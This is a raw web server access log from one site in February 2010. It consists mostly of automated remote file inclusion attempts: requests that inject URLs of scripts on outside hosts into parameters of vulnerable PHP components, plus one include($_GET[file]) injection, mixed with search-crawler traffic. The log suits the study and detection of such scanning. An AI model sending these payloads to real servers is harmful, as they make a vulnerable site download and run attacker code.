74.205.120.218 - - [08/Feb/2010:06:24:18 -0800] "GET /logs/access_100112.log/bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.106.160 - - [08/Feb/2010:06:24:29 -0800] "GET /ideal/forum/viewtopic.php?p=29202 HTTP/1.1" 404 5258 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:24:39 -0800] "GET /logs/access_100201.log%20%20//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:25:04 -0800] "GET /e404.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:25:04 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:25:04 -0800] "GET /logs/access_100112.log%20%20/e404.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:25:08 -0800] "GET /logs/access_100103.log%20%20/e404.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.90.47.134 - - [08/Feb/2010:06:25:44 -0800] "GET /logs/access_100127.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://allelon.org/log.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:06:26:17 -0800] "GET /logs/access_100117.log%20%20//plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:26:44 -0800] "GET /logs/access_100123.log%20%20/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:26:44 -0800] "GET /logs/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:26:45 -0800] "GET /index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:06:27:41 -0800] "GET /logs/access_100123.log/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:06:27:41 -0800] "GET /logs/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:06:27:41 -0800] "GET /index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:06:27:45 -0800] "GET /logs/access_100119.log/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:06:27:57 -0800] "GET /logs/access_100203.log//bbs//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:06:27:57 -0800] "GET /logs/access_100127.log//bbs//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [08/Feb/2010:06:28:15 -0800] "GET /pictures/p6 HTTP/1.0" 301 76 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [08/Feb/2010:06:28:16 -0800] "GET /pictures/p6/ HTTP/1.0" 302 7084 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [08/Feb/2010:06:28:18 -0800] "GET /login/needregister.php HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [08/Feb/2010:06:28:19 -0800] "GET /login/registerError.php HTTP/1.0" 200 6018 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [08/Feb/2010:06:28:20 -0800] "GET /style/PuagaDark.css HTTP/1.0" 200 2588 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [08/Feb/2010:06:28:20 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [08/Feb/2010:06:28:21 -0800] "GET /login/dtree.css HTTP/1.0" 404 5258 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
81.176.226.164 - - [08/Feb/2010:06:28:49 -0800] "GET /logs/access_100123.log/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:28:49 -0800] "GET /logs/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:28:49 -0800] "GET /index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [08/Feb/2010:06:28:51 -0800] "GET /logs/access_090516.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [08/Feb/2010:06:28:52 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_090516.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [08/Feb/2010:06:28:52 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/logs/access_090516.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:28:53 -0800] "GET /logs/access_100119.log/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:29:32 -0800] "GET /logs/access_100123.log/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:29:32 -0800] "GET /logs/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:29:33 -0800] "GET /index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:29:36 -0800] "GET /logs/access_100119.log/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [08/Feb/2010:06:30:52 -0800] "GET /polteaser/ HTTP/1.0" 200 1553 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
218.38.136.126 - - [08/Feb/2010:06:32:20 -0800] "GET /logs/access_100123.log/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:06:32:20 -0800] "GET /logs/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:06:32:21 -0800] "GET /index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:06:32:25 -0800] "GET /logs/access_100119.log/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [08/Feb/2010:06:32:38 -0800] "GET /component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
110.45.146.189 - - [08/Feb/2010:06:32:39 -0800] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:06:32:46 -0800] "GET /logs/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:06:32:46 -0800] "GET /logs/access_100119.log%20%20/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:06:32:46 -0800] "GET /index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:06:32:46 -0800] "GET /logs/access_100123.log%20%20/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:06:33:09 -0800] "GET /logs/access_100201.log/index.php?sayfa=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.12.74.245 - - [08/Feb/2010:06:33:25 -0800] "GET /logs/access_100104.log/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.vmtubes.com.cn/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.12.74.245 - - [08/Feb/2010:06:33:25 -0800] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.vmtubes.com.cn/footer?? HTTP/1.0" 200 4926 "-" "Mozilla/5.0" "www.puaga.com"
202.12.74.245 - - [08/Feb/2010:06:33:25 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.vmtubes.com.cn/footer?? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:33:40 -0800] "GET /logs//jrBrowser/purchase.php?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:33:40 -0800] "GET /logs/access_100129.log//jrBrowser/purchase.php?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:33:40 -0800] "GET /jrBrowser/purchase.php?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:33:41 -0800] "GET /logs/access_100129.log//jrBrowser/purchase.php?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:33:41 -0800] "GET /jrBrowser/purchase.php?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:33:41 -0800] "GET /logs//jrBrowser/purchase.php?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:33:52 -0800] "GET /jrBrowser/purchase.php?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:33:52 -0800] "GET /jrBrowser/purchase.php?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:34:01 -0800] "GET /logs/access_100104.log//jrBrowser/purchase.php?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:34:10 -0800] "GET /logs//jrBrowser/purchase.php?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:34:10 -0800] "GET /logs/access_100129.log%20%20//jrBrowser/purchase.php?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:34:19 -0800] "GET /logs//jrBrowser/purchase.php?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:34:19 -0800] "GET /logs/access_100129.log%20%20//jrBrowser/purchase.php?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:34:24 -0800] "GET /logs/access_100104.log//jrBrowser/purchase.php?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [08/Feb/2010:06:34:57 -0800] "GET /logs/access_100110.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [08/Feb/2010:06:34:57 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [08/Feb/2010:06:34:57 -0800] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:35:19 -0800] "GET /logs/access_100201.log%20%20//jrBrowser/purchase.php?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [08/Feb/2010:06:35:38 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [08/Feb/2010:06:35:38 -0800] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [08/Feb/2010:06:35:39 -0800] "GET /logs/access_100110.log%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:35:41 -0800] "GET /logs/access_100201.log%20%20//jrBrowser/purchase.php?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [08/Feb/2010:06:35:46 -0800] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [08/Feb/2010:06:35:46 -0800] "GET /logs/access_100110.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [08/Feb/2010:06:35:46 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [08/Feb/2010:06:37:05 -0800] "GET /logs/access_100102.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [08/Feb/2010:06:38:29 -0800] "GET /logs/access_100125.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:38:36 -0800] "GET /logs/access_100129.log//?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:38:36 -0800] "GET /logs//?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:38:36 -0800] "GET /?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:38:39 -0800] "GET /logs/access_100129.log//?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:38:39 -0800] "GET /logs//?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:38:40 -0800] "GET /?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:40:16 -0800] "GET /logs/access_100129.log%20%20//?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:40:16 -0800] "GET /logs//?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:40:16 -0800] "GET /?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:40:38 -0800] "GET /logs/access_100129.log%20%20//?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:40:38 -0800] "GET /logs//?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:40:39 -0800] "GET /?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:40:58 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:40:59 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:41:13 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [08/Feb/2010:06:41:43 -0800] "GET /logs/access_100115.log%20%20//popup_window.php?site_isp_root=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [08/Feb/2010:06:41:43 -0800] "GET /popup_window.php?site_isp_root=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [08/Feb/2010:06:41:45 -0800] "GET /logs//popup_window.php?site_isp_root=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:42:25 -0800] "GET /logs/access_100201.log%20%20//?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:06:42:47 -0800] "GET /logs/access_100115.log///appserv/main.php?appserv_root=? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:06:42:48 -0800] "GET //appserv/main.php?appserv_root=? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:06:42:55 -0800] "GET /logs///appserv/main.php?appserv_root=? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:06:43:01 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:06:43:02 -0800] "GET /logs/access_100201.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:06:43:02 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:06:43:06 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:06:43:06 -0800] "GET /logs/access_100201.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:06:43:06 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:43:06 -0800] "GET /logs/access_100201.log%20%20//?jamroom[jm_dir]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:06:43:37 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:45:17 -0800] "GET /logs/access_100103.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:46:45 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:46:45 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:46:45 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:06:48:11 -0800] "GET /logs/access_100103.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:06:48:15 -0800] "GET /logs/access_100126.log%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:48:26 -0800] "GET /logs/access_100103.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:06:49:03 -0800] "GET /logs/access_100126.log%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:06:49:03 -0800] "GET /logs/access_100129.log//com_dbquery/compon/administrator//write_comment_update.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:06:49:03 -0800] "GET /com_dbquery/compon/administrator//write_comment_update.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:06:49:03 -0800] "GET /logs//com_dbquery/compon/administrator//write_comment_update.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
